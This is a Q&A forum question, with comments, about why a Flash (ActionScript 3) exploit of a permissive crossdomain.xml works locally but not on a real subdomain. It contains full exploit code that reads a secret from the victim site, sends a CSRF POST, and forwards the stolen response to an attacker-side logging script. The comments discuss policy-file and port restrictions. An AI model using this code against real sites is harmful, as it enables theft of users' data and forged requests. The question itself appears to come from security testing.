# Inconsistency in performing Cross Origin requests using actionscript

Tags: actionscript-3, cross-domain, crossdomain.xml, cross-domain-policy

I am using an SWF generated from the following action script to make cross origin calls from the SWF hosted on http://something.subdomain.victim.com:8000/ to http://victim.com/a?secret=test.

https://victim.com has a permissive crossdomain.xml at https://victim.com/crossdomain.xml as given below.

```
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy 
  SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.victim.com" />
</cross-domain-policy>
```

Action Script

```
// Adaptation of an exploit by John M as defined in 
// https://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8
// PHP serverside is replaced with a simpler python cgi. Thanks to trustedsec

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLVariables;
 import flash.net.URLLoader;
 import flash.net.URLLoaderDataFormat;

 public class crossDomain extends Sprite {
  public function crossDomain() {

   // Fetching secret.

   var firstrequest:URLRequest = new URLRequest("https://victim.com/a?secret=test");
   var firstloader:URLLoader = new URLLoader();
   firstloader.addEventListener(Event.COMPLETE, completeHandler);
   try {
    firstloader.load(firstrequest);
   } catch (error: Error) {
    trace("Unable to load URL: " + error);
   }

   // Performing CSRF with a POST 

   var secondvariables:URLVariables = new URLVariables("a=test1&b=test2&c=test3&final=nothing");
   var secondrequest:URLRequest = new URLRequest("http://victim.com/someaction.html");
   secondrequest.method = URLRequestMethod.POST;
   secondrequest.data = secondvariables;
   var secondloader:URLLoader = new URLLoader();
   secondloader.dataFormat = URLLoaderDataFormat.VARIABLES;
   try {
    secondloader.load(secondrequest);
   } catch (error: Error) {
    trace("Unable to load URL");
   }

  }

  private function completeHandler(event: Event): void {

   // Retreiving the HTTP responses to attacker server.

   var request:URLRequest = new URLRequest("http://something.subdomain.victim.com:8000/cgi-bin/postlogger.py");
   var variables:URLVariables = new URLVariables();
   variables.data = event.target.data;
   request.method = URLRequestMethod.POST;
   request.data = variables;
   var loader:URLLoader = new URLLoader();
   try {
    loader.load(request);
   } catch (error: Error) {
    trace("Unable to load URL");
   }
  }
 }
}
```

1. I tested this code locally by configuring **localhost** as victim origin which serves a wildcard **crossdomain.xml** [`<allow-access-from domain="*" />`]

   2. **127.0.0.1** as an attacker origin  which serves **crossDomain.swf**
   3. The swf worked exactly as it is intended to requesting **crossdomain.xml** first followed by calls to the two URLs on origin **localhost** defined in the actionscript.
   4. However when hosting this on  http://something.subdomain.victim.com:8000, the first step where it is retrieving the crossdomain.xml from https://victim.com/crossdomain.xml  is happening. However the further requests are not.
   5. To ensure that it is not a crossdomain policy issue. I did a Man-In-The-Middle and replaced the `<allow-access-from domain="*.victim.com" />` with `<allow-access-from domain="*" />`.
   6. So at this stage, as far as the browser is concerned, the crossdomainxml for victim.com is a *. Yet further requests are not happening.

I can't find a potential reason for this confusing behavior. I am an actionscript noob.  Any pointers on why this is happening would be highly appreciated.

Comment: Just a wild guess, **http://something.subdomain.victim.com:8000/** should also have its own copy of **crossdomain.xml**. I think permit to the main domain does not automatically permit requests to sub-domains.

Comment: @organis something.subdomain.victim.com:8000 is where the exploit is hosted. It is the source origin. It having own cross domain policy should not govern requests to victim.com, right?

Comment: You said the SWF is hosted at http://127.0.0.1/

Comment: Perhaps I was not clear. The last part is about how I made sure that it isn't a code error

Comment: Please read the points 1 through towards the  end of the question.

Comment: I quite understand that it is not a code error, it's a security thing. The problem might be in the fact your SWF starts not only from sub-domain, but also from specified port. Seems this problem is similar: https://stackoverflow.com/questions/14501071/flash-policy-file-not-working-same-domain-different-port